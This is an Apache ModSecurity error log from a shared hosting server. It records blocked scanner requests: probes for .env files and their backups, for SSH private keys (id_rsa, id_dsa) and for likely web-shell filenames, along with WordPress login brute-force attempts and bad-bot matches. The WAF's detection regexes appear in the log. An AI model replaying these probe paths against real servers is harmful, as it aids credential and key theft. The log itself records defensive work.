[Tue May 26 14:51:04.828349 2026] [security2:error] [pid 648203:tid 648419] [client 195.178.110.34:39214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahVmALEQDDtxJNiDrdT8PQAAANs"]
[Tue May 26 14:51:05.275704 2026] [security2:error] [pid 648203:tid 648422] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmALEQDDtxJNiDrdT8PwAAAN4"]
[Tue May 26 14:51:06.737751 2026] [security2:error] [pid 648203:tid 648448] [client 20.206.111.203:62608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/xenon1337.php"] [unique_id "ahVmArEQDDtxJNiDrdT8aQAAAPg"]
[Tue May 26 14:51:06.737903 2026] [security2:error] [pid 648203:tid 648448] [client 20.206.111.203:62608] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/xenon1337.php"] [unique_id "ahVmArEQDDtxJNiDrdT8aQAAAPg"]
[Tue May 26 14:51:07.817360 2026] [security2:error] [pid 648203:tid 648316] [remote 123.30.233.13:45572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVmA7EQDDtxJNiDrdT8jwAAqHA"]
[Tue May 26 14:51:07.900570 2026] [security2:error] [pid 648203:tid 648345] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmA7EQDDtxJNiDrdT8iAAAAJE"]
[Tue May 26 14:51:09.295215 2026] [security2:error] [pid 648203:tid 648377] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmBLEQDDtxJNiDrdT8vwAAALE"]
[Tue May 26 14:51:09.467853 2026] [security2:error] [pid 648203:tid 648372] [client 20.206.111.203:29280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/alfa403.php"] [unique_id "ahVmBbEQDDtxJNiDrdT80gAAAKw"]
[Tue May 26 14:51:09.467946 2026] [security2:error] [pid 648203:tid 648372] [client 20.206.111.203:29280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/alfa403.php"] [unique_id "ahVmBbEQDDtxJNiDrdT80gAAAKw"]
[Tue May 26 14:51:12.019266 2026] [security2:error] [pid 648203:tid 648345] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmB7EQDDtxJNiDrdT9CAAAAJE"]
[Tue May 26 14:51:13.345158 2026] [security2:error] [pid 648203:tid 648309] [remote 111.229.141.137:42542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVmCbEQDDtxJNiDrdT9LgABAWk"]
[Tue May 26 14:51:13.600442 2026] [security2:error] [pid 648203:tid 648449] [client 20.206.111.203:64128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/test11.php"] [unique_id "ahVmCbEQDDtxJNiDrdT9QQAAAPk"]
[Tue May 26 14:51:13.600559 2026] [security2:error] [pid 648203:tid 648449] [client 20.206.111.203:64128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "omshriinfra.omshriinfrastructures.com"] [uri "/test11.php"] [unique_id "ahVmCbEQDDtxJNiDrdT9QQAAAPk"]
[Tue May 26 14:51:13.918292 2026] [security2:error] [pid 648203:tid 648378] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmCbEQDDtxJNiDrdT9OwAAALI"]
[Tue May 26 14:51:14.250520 2026] [security2:error] [pid 648203:tid 648224] [remote 178.104.164.71:33360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVmCrEQDDtxJNiDrdT9TQAAohQ"]
[Tue May 26 14:51:14.963570 2026] [security2:error] [pid 648203:tid 648449] [client 195.178.110.34:37334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/api/shared/config/.env"] [unique_id "ahVmCrEQDDtxJNiDrdT9dAAAAPk"]
[Tue May 26 14:51:15.315665 2026] [security2:error] [pid 648203:tid 648219] [remote 14.161.17.36:44188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVmC7EQDDtxJNiDrdT9fQAArA8"]
[Tue May 26 14:51:15.384061 2026] [security2:error] [pid 648203:tid 648443] [client 35.94.96.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahVmCrEQDDtxJNiDrdT9bAAAAPM"]
[Tue May 26 14:51:16.604812 2026] [security2:error] [pid 648203:tid 648231] [remote 91.227.122.219:53690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVmDLEQDDtxJNiDrdT9qgABAxs"]
[Tue May 26 14:51:16.721568 2026] [security2:error] [pid 648203:tid 648449] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmDLEQDDtxJNiDrdT9pwAAAPk"]
[Tue May 26 14:51:16.723494 2026] [security2:error] [pid 648203:tid 648242] [remote 46.101.54.125:36382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVmDLEQDDtxJNiDrdT9sAAAsiY"]
[Tue May 26 14:51:18.839601 2026] [security2:error] [pid 648203:tid 648401] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmDrEQDDtxJNiDrdT9-QAAAMk"]
[Tue May 26 14:51:20.070438 2026] [security2:error] [pid 648203:tid 648427] [client 114.119.157.84:35415] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/family-care-hospital-coimbatore/"] [unique_id "ahVmELEQDDtxJNiDrdT-JgAAAOM"], referer: https://www.video-bookmark.com/tag/family-care/
[Tue May 26 14:51:20.430824 2026] [security2:error] [pid 648203:tid 648225] [remote 82.223.24.195:59864] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.24.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVmELEQDDtxJNiDrdT-LQAAshU"]
[Tue May 26 14:51:20.564121 2026] [security2:error] [pid 648203:tid 648459] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmELEQDDtxJNiDrdT-KwAAAQM"]
[Tue May 26 14:51:20.768589 2026] [security2:error] [pid 648203:tid 648445] [client 95.182.125.184:38741] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVmELEQDDtxJNiDrdT-NAAAAPU"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 14:51:20.880442 2026] [security2:error] [pid 648203:tid 648429] [client 85.208.96.206:63252] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVmELEQDDtxJNiDrdT-OwAAAOU"]
[Tue May 26 14:51:20.880572 2026] [security2:error] [pid 648203:tid 648429] [client 85.208.96.206:63252] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVmELEQDDtxJNiDrdT-OwAAAOU"]
[Tue May 26 14:51:20.931397 2026] [security2:error] [pid 648203:tid 648433] [client 195.178.110.34:37342] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/api/shared/config/.env"] [unique_id "ahVmELEQDDtxJNiDrdT-PAAAAOk"]
[Tue May 26 14:51:21.093896 2026] [security2:error] [pid 648203:tid 648457] [client 195.178.110.34:37342] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/api/shared/.env"] [unique_id "ahVmEbEQDDtxJNiDrdT-PgAAAQE"]
[Tue May 26 14:51:21.847737 2026] [http2:info] [pid 658374:tid 658374] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:51:24.124912 2026] [security2:error] [pid 658374:tid 658584] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmE51Mb7_aby-E0KcYngAAAFA"]
[Tue May 26 14:51:25.557281 2026] [security2:error] [pid 658374:tid 658522] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmFZ1Mb7_aby-E0KcYwAAAABI"]
[Tue May 26 14:51:25.999777 2026] [security2:error] [pid 658374:tid 658475] [remote 5.42.158.148:46188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVmFZ1Mb7_aby-E0KcYzQAAHWQ"]
[Tue May 26 14:51:26.165304 2026] [security2:error] [pid 658374:tid 658526] [client 47.128.63.161:35974] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "adityacreations.co.in"] [uri "/robots.txt"] [unique_id "ahVmFp1Mb7_aby-E0KcY1AAAABY"]
[Tue May 26 14:51:27.736119 2026] [security2:error] [pid 658374:tid 658587] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmF51Mb7_aby-E0KcY8gAAAFM"]
[Tue May 26 14:51:27.850998 2026] [security2:error] [pid 658374:tid 658598] [client 14.161.115.119:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmF51Mb7_aby-E0KcY_AAAAF4"]
[Tue May 26 14:51:28.230796 2026] [security2:error] [pid 658374:tid 658594] [client 213.232.121.110:0] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVmFp1Mb7_aby-E0KcY1wAAAFo"]
[Tue May 26 14:51:28.242874 2026] [security2:error] [pid 658374:tid 658593] [client 213.232.121.110:62205] ModSecurity: Warning. Matched phrase "Nutch" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/robots.txt"] [unique_id "ahVmFp1Mb7_aby-E0KcY1QAAAFk"]
[Tue May 26 14:51:29.494432 2026] [security2:error] [pid 658374:tid 658584] [client 85.121.127.3:43898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/api/.env"] [unique_id "ahVmGZ1Mb7_aby-E0KcZOwAAAFA"]
[Tue May 26 14:51:29.511095 2026] [security2:error] [pid 658374:tid 658587] [client 85.121.127.3:43890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.env.old"] [unique_id "ahVmGZ1Mb7_aby-E0KcZPAAAAFM"]
[Tue May 26 14:51:29.513290 2026] [security2:error] [pid 658374:tid 658535] [client 85.121.127.3:43904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/app/.env"] [unique_id "ahVmGZ1Mb7_aby-E0KcZRAAAAB8"]
[Tue May 26 14:51:29.513357 2026] [security2:error] [pid 658374:tid 658583] [client 85.121.127.3:43902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/backend/.env"] [unique_id "ahVmGZ1Mb7_aby-E0KcZRQAAAE8"]
[Tue May 26 14:51:29.517354 2026] [security2:error] [pid 658374:tid 658628] [client 85.121.127.3:43886] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.env.bak"] [unique_id "ahVmGZ1Mb7_aby-E0KcZSgAAAHw"]
[Tue May 26 14:51:29.534270 2026] [security2:error] [pid 658374:tid 658600] [client 85.121.127.3:43906] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/public/.env"] [unique_id "ahVmGZ1Mb7_aby-E0KcZXgAAAGA"]
[Tue May 26 14:51:29.534258 2026] [security2:error] [pid 658374:tid 658559] [client 85.121.127.3:43910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVmGZ1Mb7_aby-E0KcZTgAAADc"]
[Tue May 26 14:51:29.536665 2026] [security2:error] [pid 658374:tid 658509] [client 85.121.127.3:43884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.env.backup"] [unique_id "ahVmGZ1Mb7_aby-E0KcZVwAAAAU"]
[Tue May 26 14:51:29.545195 2026] [security2:error] [pid 658374:tid 658523] [client 85.121.127.3:44030] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVmGZ1Mb7_aby-E0KcZYAAAABM"]
[Tue May 26 14:51:29.548041 2026] [security2:error] [pid 658374:tid 658577] [client 85.121.127.3:43874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.firsteyeinc.taotechservices.com"] [uri "/.env"] [unique_id "ahVmGZ1Mb7_aby-E0KcZYwAAAEk"]
[Tue May 26 14:51:30.091499 2026] [security2:error] [pid 658374:tid 658533] [client 213.35.106.232:65170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahVmGZ1Mb7_aby-E0KcZcQAAAB0"]
[Tue May 26 14:51:30.180164 2026] [security2:error] [pid 658374:tid 658546] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmGZ1Mb7_aby-E0KcZZwAAACo"]
[Tue May 26 14:51:31.523739 2026] [security2:error] [pid 658374:tid 658546] [client 213.35.106.232:65328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVmG51Mb7_aby-E0KcZoAAAACo"]
[Tue May 26 14:51:32.387037 2026] [security2:error] [pid 658374:tid 658507] [client 213.35.106.232:49178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cliffengg.svijaykumar.in"] [uri "/wp-admin/load-scripts.php"] [unique_id "ahVmHJ1Mb7_aby-E0KcZtgAAAAM"]
[Tue May 26 14:51:32.410211 2026] [security2:error] [pid 658374:tid 658554] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVmG51Mb7_aby-E0KcZrAAAADI"]
